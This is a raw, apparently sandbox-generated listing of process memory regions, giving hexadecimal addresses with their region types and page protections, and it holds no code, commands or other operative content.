trusted library allocation
page read and write
67C2000
trusted library allocation
page read and write
5038000
heap
page read and write
8405000
trusted library allocation
page read and write
781800624000
trusted library allocation
page read and write
6E94000
trusted library allocation
page read and write
218858BD000
heap
page read and write
781C024B0000
trusted library allocation
page read and write
30D0000
heap
page read and write
2188EBA6000
heap
page read and write
781C02734000
trusted library allocation
page read and write
781800248000
trusted library allocation
page read and write
715E000
stack
page read and write
85CE000
stack
page read and write
5C0E000
stack
page read and write
2188EBDF000
heap
page read and write
69B5000
heap
page read and write
781C03A42000
trusted library allocation
page read and write
7818006CC000
trusted library allocation
page read and write
463D000
stack
page read and write
6E94000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
719E000
stack
page read and write
781C03F54000
trusted library allocation
page read and write
6CA2000
heap
page read and write
6945000
heap
page execute and read and write
2188EB74000
heap
page read and write
781C04084000
trusted library allocation
page read and write
781800168000
trusted library allocation
page read and write
74B9000
trusted library allocation
page read and write
218857F3000
heap
page read and write
781C03E28000
trusted library allocation
page read and write
781C03930000
trusted library allocation
page read and write
781C03A84000
trusted library allocation
page read and write
57D000
stack
page read and write
781C02448000
trusted library allocation
page read and write
298800050000
trusted library allocation
page read and write
218894E4000
heap
page read and write
7818004CC000
trusted library allocation
page read and write
781C02488000
trusted library allocation
page read and write
7B7000068000
direct allocation
page read and write
575B1FE000
stack
page read and write
690E000
stack
page read and write
21888F93000
heap
page read and write
7B70000C0000
direct allocation
page read and write
680D000
stack
page read and write
781C04168000
trusted library allocation
page read and write
781C03670000
trusted library allocation
page read and write
4C32000
trusted library allocation
page read and write
781C023C8000
trusted library allocation
page read and write
69B3000
heap
page read and write
B113000
heap
page read and write
74AB000
trusted library allocation
page read and write
781800514000
trusted library allocation
page read and write
3088000
trusted library allocation
page read and write
781C039C0000
trusted library allocation
page read and write
6C3E000
heap
page read and write
6E83000
trusted library allocation
page read and write
781C03F94000
trusted library allocation
page read and write
6E99000
trusted library allocation
page read and write
6E8C000
trusted library allocation
page read and write
7818005B4000
trusted library allocation
page read and write
7818000CC000
trusted library allocation
page read and write
829A000
heap
page read and write
69CA000
heap
page read and write
781C03804000
trusted library allocation
page read and write
BB12000
trusted library allocation
page execute
781C02728000
trusted library allocation
page read and write
6E94000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C037A0000
trusted library allocation
page read and write
781C02254000
trusted library allocation
page read and write
6C81000
heap
page read and write
2188EB40000
heap
page read and write
781800680000
trusted library allocation
page read and write
3010000
heap
page read and write
781C03D84000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781C02CFC000
trusted library allocation
page read and write
781C036C8000
trusted library allocation
page read and write
781C030B0000
trusted library allocation
page read and write
6E51000
trusted library allocation
page read and write
6CAF000
heap
page read and write
298800090000
trusted library allocation
page read and write
21888F70000
heap
page read and write
6F4F000
trusted library allocation
page read and write
6E9A000
trusted library allocation
page read and write
21888F95000
heap
page read and write
781800018000
trusted library allocation
page read and write
860E000
stack
page read and write
69B3000
heap
page read and write
721E000
stack
page read and write
2188F427000
unclassified section
page read and write
781C03810000
trusted library allocation
page read and write
781C03F9C000
trusted library allocation
page read and write
781C02558000
trusted library allocation
page read and write
6E94000
trusted library allocation
page read and write
8719000
heap
page read and write
69B5000
heap
page read and write
781C03B54000
trusted library allocation
page read and write
7180000
heap
page read and write
2188EB50000
heap
page read and write
6CBE000
stack
page read and write
781C028B8000
trusted library allocation
page read and write
B1BC000
heap
page read and write
6C42000
heap
page read and write
781C0359C000
trusted library allocation
page read and write
2188EBD7000
heap
page read and write
69B3000
heap
page read and write
6D01000
heap
page read and write
69B3000
heap
page read and write
781C02728000
trusted library allocation
page read and write
6CE0000
heap
page read and write
781C02670000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C0264C000
trusted library allocation
page read and write
7818005A0000
trusted library allocation
page read and write
69B5000
heap
page read and write
B05A000
heap
page read and write
781C029F6000
trusted library allocation
page read and write
218894CA000
heap
page read and write
B908000
trusted library allocation
page read and write
6CD0000
heap
page read and write
69B3000
heap
page read and write
6E94000
trusted library allocation
page read and write
AED000
trusted library allocation
page execute and read and write
5130000
trusted library allocation
page read and write
6C90000
trusted library allocation
page execute and read and write
69B9000
heap
page read and write
2188EB95000
heap
page read and write
316D000
heap
page read and write
B983000
trusted library allocation
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
786B000
stack
page read and write
2188EBF8000
heap
page read and write
6C3E000
heap
page read and write
781C02660000
trusted library allocation
page read and write
781C03401000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C037A0000
trusted library allocation
page read and write
B208000
heap
page read and write
6CBB000
heap
page read and write
2188EBB7000
heap
page read and write
69B3000
heap
page read and write
781C041E8000
trusted library allocation
page read and write
781C041EC000
trusted library allocation
page read and write
2188EB74000
heap
page read and write
BAF9000
trusted library allocation
page read and write
5CF000
heap
page read and write
900000
trusted library allocation
page read and write
781C03694000
trusted library allocation
page read and write
6C30000
heap
page read and write
69B5000
heap
page read and write
781C0287C000
trusted library allocation
page read and write
69B5000
heap
page read and write
6F3F000
trusted library allocation
page read and write
2188EB3C000
heap
page read and write
BBF0000
trusted library allocation
page read and write
781C03300000
trusted library allocation
page read and write
6E90000
trusted library allocation
page read and write
6F00000
heap
page read and write
781C03D08000
trusted library allocation
page read and write
560000
heap
page read and write
781C03390000
trusted library allocation
page read and write
6D7D000
heap
page read and write
6BD0000
trusted library allocation
page read and write
575C1FB000
stack
page read and write
69B9000
heap
page read and write
781C0249C000
trusted library allocation
page read and write
69B3000
heap
page read and write
6E94000
trusted library allocation
page read and write
B159000
heap
page read and write
5EC000
heap
page read and write
781C029E8000
trusted library allocation
page read and write
781C02BA8000
trusted library allocation
page read and write
781800224000
trusted library allocation
page read and write
781C02594000
trusted library allocation
page read and write
2188EB61000
heap
page read and write
4FF0000
heap
page read and write
781C02804000
trusted library allocation
page read and write
781C03714000
trusted library allocation
page read and write
6C58000
heap
page read and write
5C30000
trusted library allocation
page read and write
781C02670000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C03FB4000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
7818004BC000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C03958000
trusted library allocation
page read and write
749E000
trusted library allocation
page read and write
6C53000
heap
page read and write
69B5000
heap
page read and write
3141000
heap
page read and write
B182000
heap
page read and write
298800068000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02864000
trusted library allocation
page read and write
B20000
heap
page read and write
6C70000
trusted library allocation
page execute and read and write
781C03A78000
trusted library allocation
page read and write
781C03A6D000
trusted library allocation
page read and write
4C69000
trusted library allocation
page read and write
2988000D0000
trusted library allocation
page read and write
6CA4000
heap
page read and write
E2D1000
trusted library allocation
page read and write
69B3000
heap
page read and write
6CE0000
heap
page read and write
80FF000
stack
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
575D9FC000
stack
page read and write
69B5000
heap
page read and write
69B9000
heap
page read and write
6C30000
heap
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
781C022A0000
trusted library allocation
page read and write
781C023D4000
trusted library allocation
page read and write
50F0000
heap
page read and write
781C026F4000
trusted library allocation
page read and write
6F3F000
trusted library allocation
page read and write
6C35000
heap
page read and write
B983000
trusted library allocation
page read and write
781C0401C000
trusted library allocation
page read and write
526E000
trusted library allocation
page read and write
781C00208000
trusted library allocation
page read and write
4C44000
trusted library allocation
page read and write
824F000
heap
page read and write
781C02728000
trusted library allocation
page read and write
781C02C9C000
trusted library allocation
page read and write
6CAF000
heap
page read and write
781C03080000
trusted library allocation
page read and write
BB02000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C03770000
trusted library allocation
page read and write
218894E0000
heap
page read and write
2188EB37000
heap
page read and write
4597000
heap
page read and write
781800688000
trusted library allocation
page read and write
781C039AC000
trusted library allocation
page read and write
81DE000
heap
page read and write
B208000
heap
page read and write
31D6000
heap
page read and write
69B3000
heap
page read and write
3110000
heap
page read and write
781C03E24000
trusted library allocation
page read and write
8150000
heap
page read and write
B983000
trusted library allocation
page read and write
781C03FF8000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C03D0C000
trusted library allocation
page read and write
781C024A0000
trusted library allocation
page read and write
6C2E000
heap
page read and write
57591FE000
stack
page read and write
69B3000
heap
page read and write
2188EB84000
heap
page read and write
4B6E000
stack
page read and write
781C04154000
trusted library allocation
page read and write
2188EB84000
heap
page read and write
21888F93000
heap
page read and write
74B0000
heap
page read and write
6E90000
trusted library allocation
page read and write
781C03CE4000
trusted library allocation
page read and write
4FFF000
heap
page read and write
31BA000
heap
page read and write
781C02D0C000
trusted library allocation
page read and write
2188EBC3000
heap
page read and write
77F2000
trusted library allocation
page read and write
69B2000
heap
page read and write
2188EB21000
heap
page read and write
77D0000
trusted library allocation
page read and write
78180014C000
trusted library allocation
page read and write
781C02998000
trusted library allocation
page read and write
781C04190000
trusted library allocation
page read and write
2188EB50000
heap
page read and write
781C03F7C000
trusted library allocation
page read and write
781C03CBC000
trusted library allocation
page read and write
781800041000
trusted library allocation
page read and write
6C56000
heap
page read and write
69B9000
heap
page read and write
7B7000064000
direct allocation
page read and write
4BAF000
stack
page read and write
298800090000
trusted library allocation
page read and write
B207000
heap
page read and write
51EE000
heap
page read and write
69B3000
heap
page read and write
317A000
heap
page read and write
526E000
trusted library allocation
page read and write
781C03D88000
trusted library allocation
page read and write
69B9000
heap
page read and write
6F3E000
stack
page read and write
7B7000018000
direct allocation
page read and write
21888F95000
heap
page read and write
6CAA000
heap
page read and write
B983000
trusted library allocation
page read and write
69B5000
heap
page read and write
21888440000
heap
page read and write
C8D1000
trusted library allocation
page read and write
6C68000
heap
page read and write
6E9F000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
69B9000
heap
page read and write
6C29000
heap
page read and write
69B3000
heap
page read and write
781C03958000
trusted library allocation
page read and write
69B9000
heap
page read and write
21888F95000
heap
page read and write
B870000
trusted library allocation
page read and write
781800524000
trusted library allocation
page read and write
781C024BC000
trusted library allocation
page read and write
298800004000
trusted library allocation
page read and write
781C03B6C000
trusted library allocation
page read and write
57589FA000
stack
page read and write
21888F95000
heap
page read and write
781C03230000
trusted library allocation
page read and write
7080000
trusted library allocation
page read and write
501F000
heap
page read and write
6C55000
heap
page read and write
781C0232C000
trusted library allocation
page read and write
69B3000
heap
page read and write
2188CF04000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C03A78000
trusted library allocation
page read and write
781C04044000
trusted library allocation
page read and write
B796000
trusted library allocation
page read and write
781C032E4000
trusted library allocation
page read and write
781C02A90000
trusted library allocation
page read and write
8148000
heap
page read and write
21888F9D000
heap
page read and write
21888F9B000
heap
page read and write
781C03CA0000
trusted library allocation
page read and write
6CC0000
heap
page read and write
218894DE000
heap
page read and write
6CAA000
heap
page read and write
6CAF000
heap
page read and write
6C42000
heap
page read and write
B220000
heap
page read and write
781C03E70000
trusted library allocation
page read and write
6B0E000
stack
page read and write
781C03DC0000
trusted library allocation
page read and write
7B7000008000
direct allocation
page read and write
6BD000
heap
page read and write
781C03D9C000
trusted library allocation
page read and write
781C03764000
trusted library allocation
page read and write
781C023D4000
trusted library allocation
page read and write
1CE000
stack
page read and write
21888F9B000
heap
page read and write
6633000
trusted library allocation
page read and write
781C0405C000
trusted library allocation
page read and write
781C032D8000
trusted library allocation
page read and write
781C03684000
trusted library allocation
page read and write
8224000
heap
page read and write
781C03344000
trusted library allocation
page read and write
6C53000
heap
page read and write
6C40000
trusted library allocation
page read and write
2188EB84000
heap
page read and write
575B9FA000
stack
page read and write
2188EB77000
heap
page read and write
21890410000
trusted library section
page read and write
21888F95000
heap
page read and write
78180053C000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
9851000
trusted library allocation
page read and write
781C02864000
trusted library allocation
page read and write
781800500000
trusted library allocation
page read and write
B011000
heap
page read and write
781C03650000
trusted library allocation
page read and write
6F3F000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02294000
trusted library allocation
page read and write
69B9000
heap
page read and write
B06000
trusted library allocation
page execute and read and write
6CBA000
heap
page read and write
7095000
heap
page read and write
781C02F68000
trusted library allocation
page read and write
8711000
heap
page read and write
69B9000
heap
page read and write
781C03D20000
trusted library allocation
page read and write
7818006BC000
trusted library allocation
page read and write
69B5000
heap
page read and write
8407000
trusted library allocation
page read and write
574F1ED000
stack
page read and write
781C023E0000
trusted library allocation
page read and write
2188EBE7000
heap
page read and write
758E000
trusted library allocation
page read and write
69B3000
heap
page read and write
31CB000
heap
page read and write
6C4E000
heap
page read and write
21888F9F000
heap
page read and write
B180000
heap
page read and write
7B70000CC000
direct allocation
page read and write
650000
heap
page read and write
7590000
trusted library allocation
page read and write
78180058C000
trusted library allocation
page read and write
6CE0000
heap
page read and write
781C03388000
trusted library allocation
page read and write
781C03E08000
trusted library allocation
page read and write
2188EBDF000
heap
page read and write
B983000
trusted library allocation
page read and write
2188EB31000
heap
page read and write
2188F920000
heap
page read and write
6C5C000
heap
page read and write
781800040000
trusted library allocation
page read and write
4B2F000
trusted library allocation
page read and write
72FD000
stack
page read and write
781C02C34000
trusted library allocation
page read and write
7818005E4000
trusted library allocation
page read and write
69B9000
heap
page read and write
2188EB21000
heap
page read and write
5228000
trusted library allocation
page read and write
781C03914000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C02728000
trusted library allocation
page read and write
781C03D04000
trusted library allocation
page read and write
781C033D4000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
69B9000
heap
page read and write
B180000
heap
page read and write
21888FA3000
heap
page read and write
8292000
heap
page read and write
69B3000
heap
page read and write
5288000
trusted library allocation
page read and write
56FC000
stack
page read and write
298800084000
trusted library allocation
page read and write
781C03864000
trusted library allocation
page read and write
781C02460000
trusted library allocation
page read and write
316D000
heap
page read and write
21888F9D000
heap
page read and write
781C037B0000
trusted library allocation
page read and write
8851000
trusted library allocation
page read and write
781C0223C000
trusted library allocation
page read and write
69B9000
heap
page read and write
781C02DD0000
trusted library allocation
page read and write
5290000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781800698000
trusted library allocation
page read and write
21888F88000
heap
page read and write
44CE000
stack
page read and write
781C04150000
trusted library allocation
page read and write
2188F200000
trusted library section
page read and write
781C02474000
trusted library allocation
page read and write
6C2E000
heap
page read and write
6C65000
heap
page read and write
B194000
heap
page read and write
B983000
trusted library allocation
page read and write
781C02544000
trusted library allocation
page read and write
B792000
trusted library allocation
page read and write
781C03630000
trusted library allocation
page read and write
781C03114000
trusted library allocation
page read and write
781800144000
trusted library allocation
page read and write
78180020C000
trusted library allocation
page read and write
6E8C000
trusted library allocation
page read and write
8256000
heap
page read and write
18E000
unkown
page read and write
218894ED000
heap
page read and write
6E8C000
trusted library allocation
page read and write
69B9000
heap
page read and write
781800001000
trusted library allocation
page read and write
539E000
stack
page read and write
2188EB84000
heap
page read and write
6CE000
heap
page read and write
7B7000074000
direct allocation
page read and write
781C040B8000
trusted library allocation
page read and write
781C02A3C000
trusted library allocation
page read and write
6C42000
heap
page read and write
2B0A000
stack
page read and write
51E3000
heap
page read and write
781800684000
trusted library allocation
page read and write
950000
heap
page read and write
5FE000
heap
page read and write
2EF9000
stack
page read and write
6C52000
heap
page read and write
21888F93000
heap
page read and write
31A9000
heap
page read and write
218857CB000
heap
page read and write
8192000
heap
page read and write
781C02590000
trusted library allocation
page read and write
6F34000
trusted library allocation
page read and write
6E94000
trusted library allocation
page read and write
781C02558000
trusted library allocation
page read and write
6C65000
heap
page read and write
6960000
heap
page read and write
781800404000
trusted library allocation
page read and write
BAF9000
trusted library allocation
page read and write
2188EB95000
heap
page read and write
7B7000084000
direct allocation
page read and write
526E000
trusted library allocation
page read and write
781C03AE1000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
D2D1000
trusted library allocation
page read and write
781C03734000
trusted library allocation
page read and write
B0F9000
heap
page read and write
781C03258000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
6E91000
trusted library allocation
page read and write
746E000
stack
page read and write
75A0000
trusted library allocation
page read and write
781C01001000
trusted library allocation
page read and write
781C02A04000
trusted library allocation
page read and write
458E000
stack
page read and write
B983000
trusted library allocation
page read and write
57599FF000
stack
page read and write
69B9000
heap
page read and write
B796000
trusted library allocation
page read and write
69CE000
heap
page read and write
781C030C4000
trusted library allocation
page read and write
B088000
heap
page read and write
703E000
stack
page read and write
781C0358C000
trusted library allocation
page read and write
6C35000
heap
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
2188EB54000
heap
page read and write
781C02668000
trusted library allocation
page read and write
21888FA2000
heap
page read and write
82D4000
heap
page read and write
781C0381C000
trusted library allocation
page read and write
433E000
stack
page read and write
6E90000
trusted library allocation
page read and write
575A9FE000
stack
page read and write
BAF9000
trusted library allocation
page read and write
BAF9000
trusted library allocation
page read and write
B7B2000
trusted library allocation
page read and write
781C02418000
trusted library allocation
page read and write
6E88000
trusted library allocation
page read and write
29880003C000
trusted library allocation
page read and write
69B9000
heap
page read and write
5C2C000
trusted library allocation
page read and write
6EFE000
stack
page read and write
7010000
heap
page read and write
6D8E000
heap
page read and write
6C29000
heap
page read and write
781C04068000
trusted library allocation
page read and write
781C03830000
trusted library allocation
page read and write
781C00C01000
trusted library allocation
page read and write
218894E6000
heap
page read and write
831E000
heap
page read and write
21888F9F000
heap
page read and write
6CAA000
heap
page read and write
2988000A0000
trusted library allocation
page read and write
31A9000
heap
page read and write
781C03AA0000
trusted library allocation
page read and write
B181000
heap
page read and write
6CF5000
heap
page read and write
781C03FB8000
trusted library allocation
page read and write
6C33000
heap
page read and write
69B9000
heap
page read and write
781C02801000
trusted library allocation
page read and write
781C02774000
trusted library allocation
page read and write
69B9000
heap
page read and write
6FF3000
heap
page read and write
8B0000
trusted library allocation
page read and write
781C02660000
trusted library allocation
page read and write
6E81000
trusted library allocation
page read and write
AFD000
trusted library allocation
page execute and read and write
781C02978000
trusted library allocation
page read and write
6985000
heap
page read and write
298800044000
trusted library allocation
page read and write
69B3000
heap
page read and write
2188EBB7000
heap
page read and write
781C03928000
trusted library allocation
page read and write
2188EB74000
heap
page read and write
BB000
stack
page read and write
7B7000028000
direct allocation
page read and write
781C02AD2000
trusted library allocation
page read and write
31B9000
heap
page read and write
79E000
stack
page read and write
69B3000
heap
page read and write
6F3F000
trusted library allocation
page read and write
7B70000F7000
direct allocation
page read and write
69B3000
heap
page read and write
781C02664000
trusted library allocation
page read and write
940000
heap
page read and write
31DE000
heap
page read and write
781C03E34000
trusted library allocation
page read and write
69CB000
heap
page read and write
6E90000
trusted library allocation
page read and write
2188EB16000
heap
page read and write
69B9000
heap
page read and write
781C02CA0000
trusted library allocation
page read and write
DD0000
heap
page readonly
57541FB000
stack
page read and write
9251000
trusted library allocation
page read and write
781800201000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
781C0330C000
trusted library allocation
page read and write
575F9FC000
stack
page read and write
781C022DC000
trusted library allocation
page read and write
75F0000
heap
page read and write
781C04048000
trusted library allocation
page read and write
6CAF000
heap
page read and write
781C03378000
trusted library allocation
page read and write
B1F1000
heap
page read and write
81B9000
heap
page read and write
6D04000
heap
page read and write
781C02E01000
trusted library allocation
page read and write
2188EB22000
heap
page read and write
781C04004000
trusted library allocation
page read and write
781C02868000
trusted library allocation
page read and write
57579FE000
stack
page read and write
2188EB24000
heap
page read and write
BAF9000
trusted library allocation
page read and write
781C04094000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
7B7000078000
direct allocation
page read and write
31D3000
heap
page read and write
781C0264C000
trusted library allocation
page read and write
8FC000
stack
page read and write
781800088000
trusted library allocation
page read and write
69C2000
heap
page read and write
781C03DAC000
trusted library allocation
page read and write
781C037B8000
trusted library allocation
page read and write
BAF1000
trusted library allocation
page read and write
6C2E000
heap
page read and write
781C023BC000
trusted library allocation
page read and write
781C02404000
trusted library allocation
page read and write
2188F474000
trusted library section
page read and write
69C7000
heap
page read and write
B47C000
heap
page read and write
864000
trusted library allocation
page read and write
B06C000
heap
page read and write
781C02585000
trusted library allocation
page read and write
467000
heap
page read and write
5F3E000
stack
page read and write
781C03CC8000
trusted library allocation
page read and write
B04B000
heap
page read and write
6A8E000
stack
page read and write
B025000
heap
page read and write
575C9FD000
stack
page read and write
78180076C000
trusted library allocation
page read and write
781800670000
trusted library allocation
page read and write
781C03914000
trusted library allocation
page read and write
781C03338000
trusted library allocation
page read and write
781C03F70000
trusted library allocation
page read and write
2188B600000
trusted library allocation
page read and write
781C03D64000
trusted library allocation
page read and write
781C03DD0000
trusted library allocation
page read and write
7818004E0000
trusted library allocation
page read and write
781C03684000
trusted library allocation
page read and write
218857EE000
heap
page read and write
B409000
heap
page read and write
21888F8D000
heap
page read and write
6CEE000
heap
page read and write
781C031A4000
trusted library allocation
page read and write
69B9000
heap
page read and write
86BF000
heap
page read and write
69B3000
heap
page read and write
2188EB50000
heap
page read and write
57559FD000
stack
page read and write
B2D1000
trusted library allocation
page read and write
846C000
heap
page read and write
502E000
heap
page read and write
781C03AB0000
trusted library allocation
page read and write
4BB0000
unkown
page read and write
6CF7000
heap
page read and write
21888F95000
heap
page read and write
69B9000
heap
page read and write
6CE0000
heap
page read and write
317A000
heap
page read and write
69B9000
heap
page read and write
781C032C4000
trusted library allocation
page read and write
B405000
heap
page read and write
781C040B4000
trusted library allocation
page read and write
781C0358C000
trusted library allocation
page read and write
781C03B0C000
trusted library allocation
page read and write
849000
heap
page read and write
6C3E000
heap
page read and write
781C0407C000
trusted library allocation
page read and write
218857EB000
heap
page read and write
52D0000
trusted library allocation
page read and write
781C03890000
trusted library allocation
page read and write
B410000
heap
page read and write
6C49000
heap
page read and write
2188EB54000
heap
page read and write
78180055C000
trusted library allocation
page read and write
781C00201000
trusted library allocation
page read and write
781C03D4C000
trusted library allocation
page read and write
6C3E000
heap
page read and write
454F000
stack
page read and write
6E90000
trusted library allocation
page read and write
781C0406C000
trusted library allocation
page read and write
2988000E8000
trusted library allocation
page read and write
495D000
stack
page read and write
7B7000044000
direct allocation
page read and write
21888F93000
heap
page read and write
6CA4000
heap
page read and write
4C53000
trusted library allocation
page read and write
781C03554000
trusted library allocation
page read and write
2188EBA6000
heap
page read and write
6C4A000
heap
page read and write
2188EBE7000
heap
page read and write
6C6A000
heap
page read and write
781C02590000
trusted library allocation
page read and write
7818005AC000
trusted library allocation
page read and write
21889598000
heap
page read and write
6F4F000
trusted library allocation
page read and write
2188EB30000
heap
page read and write
67A8000
trusted library allocation
page read and write
781C02784000
trusted library allocation
page read and write
DCE000
stack
page read and write
6E85000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
21888F93000
heap
page read and write
959000
heap
page read and write
781C03004000
trusted library allocation
page read and write
781800578000
trusted library allocation
page read and write
69B9000
heap
page read and write
7FA0000
trusted library allocation
page read and write
69B5000
heap
page read and write
781C03CF4000
trusted library allocation
page read and write
6CE9000
heap
page read and write
575E1FE000
stack
page read and write
781C03458000
trusted library allocation
page read and write
781C02790000
trusted library allocation
page read and write
B1B5000
heap
page read and write
781C02EE0000
trusted library allocation
page read and write
69B9000
heap
page read and write
31DC000
heap
page read and write
78180002C000
trusted library allocation
page read and write
781C0419D000
trusted library allocation
page read and write
69B3000
heap
page read and write
57511FF000
stack
page read and write
6C2B000
heap
page read and write
21888443000
heap
page read and write
499E000
stack
page read and write
491F000
stack
page read and write
74D3000
trusted library allocation
page read and write
781C02E90000
trusted library allocation
page read and write
69B3000
heap
page read and write
6E92000
trusted library allocation
page read and write
69B5000
heap
page read and write
6C99000
heap
page read and write
B185000
heap
page read and write
781C039F4000
trusted library allocation
page read and write
3060000
heap
page read and write
350000
heap
page read and write
781C03B60000
trusted library allocation
page read and write
781C02A01000
trusted library allocation
page read and write
781800168000
trusted library allocation
page read and write
78180056C000
trusted library allocation
page read and write
21888F95000
heap
page read and write
575D1FD000
stack
page read and write
7790000
trusted library allocation
page read and write
2988000AC000
trusted library allocation
page read and write
748E000
trusted library allocation
page read and write
BAFF000
trusted library allocation
page read and write
781800744000
trusted library allocation
page read and write
3196000
heap
page read and write
21885858000
heap
page read and write
B031000
heap
page read and write
6BA0000
trusted library allocation
page read and write
6D0000
heap
page read and write
2188EB50000
heap
page read and write
781C02A44000
trusted library allocation
page read and write
6E96000
trusted library allocation
page read and write
723E000
stack
page read and write
B1BC000
heap
page read and write
E0E000
stack
page read and write
781C02594000
trusted library allocation
page read and write
B40E000
heap
page read and write
69B3000
heap
page read and write
69B9000
heap
page read and write
B983000
trusted library allocation
page read and write
81F6000
stack
page read and write
21888F9B000
heap
page read and write
920000
trusted library allocation
page read and write
781C02E04000
trusted library allocation
page read and write
7C0000
heap
page read and write
69B3000
heap
page read and write
781800540000
trusted library allocation
page read and write
781C03204000
trusted library allocation
page read and write
781C02E6C000
trusted library allocation
page read and write
21888F98000
heap
page read and write
4C3A000
trusted library allocation
page read and write
6C42000
heap
page read and write
7818000CB000
trusted library allocation
page read and write
51C5000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
781C03974000
trusted library allocation
page read and write
6C25000
heap
page execute and read and write
6B8D000
trusted library allocation
page read and write
72BE000
stack
page read and write
B077000
heap
page read and write
7CF000
unkown
page read and write
781C02594000
trusted library allocation
page read and write
781C02660000
trusted library allocation
page read and write
781C03E5C000
trusted library allocation
page read and write
6D34000
heap
page read and write
6E9E000
trusted library allocation
page read and write
69B9000
heap
page read and write
69B5000
heap
page read and write
77E0000
trusted library allocation
page read and write
B074000
heap
page read and write
A8D1000
trusted library allocation
page read and write
B3EE000
heap
page read and write
69B3000
heap
page read and write
6A0B000
stack
page read and write
7818005D4000
trusted library allocation
page read and write
8030000
trusted library allocation
page read and write
7818000F4000
trusted library allocation
page read and write
781C00E01000
trusted library allocation
page read and write
4C4B000
trusted library allocation
page read and write
D8D1000
trusted library allocation
page read and write
B194000
heap
page read and write
DE0000
trusted library allocation
page read and write
2988000BC000
trusted library allocation
page read and write
781C02A60000
trusted library allocation
page read and write
573C000
stack
page read and write
7F7A0000
trusted library allocation
page execute and read and write
2988000A0000
trusted library allocation
page read and write
781C02681000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
781C023BC000
trusted library allocation
page read and write
7818004F0000
trusted library allocation
page read and write
7818000ED000
trusted library allocation
page read and write
8703000
heap
page read and write
781C0222D000
trusted library allocation
page read and write
BC5B000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
729E000
stack
page read and write
B85A000
trusted library allocation
page read and write
31DA000
heap
page read and write
8140000
heap
page read and write
781C02744000
trusted library allocation
page read and write
B793000
trusted library allocation
page read and write
69B3000
heap
page read and write
69B3000
heap
page read and write
910000
trusted library allocation
page read and write
7483000
trusted library allocation
page read and write
218894C6000
heap
page read and write
6C2E000
heap
page read and write
69B9000
heap
page read and write
21885730000
heap
page read and write
2188FE20000
trusted library section
page read and write
70B0000
trusted library allocation
page execute
D8E000
stack
page read and write
781800620000
trusted library allocation
page read and write
21885AA0000
trusted library allocation
page read and write
6E83000
trusted library allocation
page read and write
781C02B50000
trusted library allocation
page read and write
781C02EEC000
trusted library allocation
page read and write
69B5000
heap
page read and write
825E000
heap
page read and write
2188EC08000
heap
page read and write
B180000
heap
page read and write
781C02254000
trusted library allocation
page read and write
B360000
heap
page read and write
21885A80000
heap
page readonly
781C03CD8000
trusted library allocation
page read and write
781800110000
trusted library allocation
page read and write
781C023BC000
trusted library allocation
page read and write
781C04018000
trusted library allocation
page read and write
781C02F08000
trusted library allocation
page read and write
781800484000
trusted library allocation
page read and write
781C033CC000
trusted library allocation
page read and write
781800144000
trusted library allocation
page read and write
781C02601000
trusted library allocation
page read and write
2188EBF9000
heap
page read and write
B089000
heap
page read and write
B983000
trusted library allocation
page read and write
5005000
heap
page read and write
B7B2000
trusted library allocation
page read and write
781C03FDC000
trusted library allocation
page read and write
69B3000
heap
page read and write
7818004AC000
trusted library allocation
page read and write
74B3000
trusted library allocation
page read and write
57509FE000
stack
page read and write
6F3F000
trusted library allocation
page read and write
781C02B15000
trusted library allocation
page read and write
843C000
stack
page read and write
2188EB10000
heap
page read and write
4A81000
trusted library allocation
page read and write
781C02FCC000
trusted library allocation
page read and write
2188F923000
heap
page read and write
781C03914000
trusted library allocation
page read and write
781C02744000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
6F40000
heap
page execute and read and write
7B7000034000
direct allocation
page read and write
DAD000
stack
page read and write
2188EB40000
heap
page read and write
2188EB84000
heap
page read and write
69B3000
heap
page read and write
781C03A78000
trusted library allocation
page read and write
5290000
trusted library allocation
page read and write
781C03E20000
trusted library allocation
page read and write
781C02594000
trusted library allocation
page read and write
69AF000
heap
page read and write
2988000A0000
trusted library allocation
page read and write
21888F9F000
heap
page read and write
6972000
heap
page read and write
6AA0000
heap
page read and write
330E000
stack
page read and write
5C36000
trusted library allocation
page read and write
6C59000
heap
page read and write
69B9000
heap
page read and write
B08C000
heap
page read and write
781C03974000
trusted library allocation
page read and write
696F000
heap
page read and write
A40000
heap
page read and write
781C024C4000
trusted library allocation
page read and write
781C03670000
trusted library allocation
page read and write
477D000
stack
page read and write
5A81000
trusted library allocation
page read and write
781C03EB0000
trusted library allocation
page read and write
781C03C74000
trusted library allocation
page read and write
6910000
trusted library allocation
page read and write
69B9000
heap
page read and write
B47C000
heap
page read and write
57519FE000
stack
page read and write
781C02201000
trusted library allocation
page read and write
781C03651000
trusted library allocation
page read and write
78180023C000
trusted library allocation
page read and write
2188EB95000
heap
page read and write
781C022B2000
trusted library allocation
page read and write
4C41000
trusted library allocation
page read and write
43FE000
stack
page read and write
6E8C000
trusted library allocation
page read and write
781C03E80000
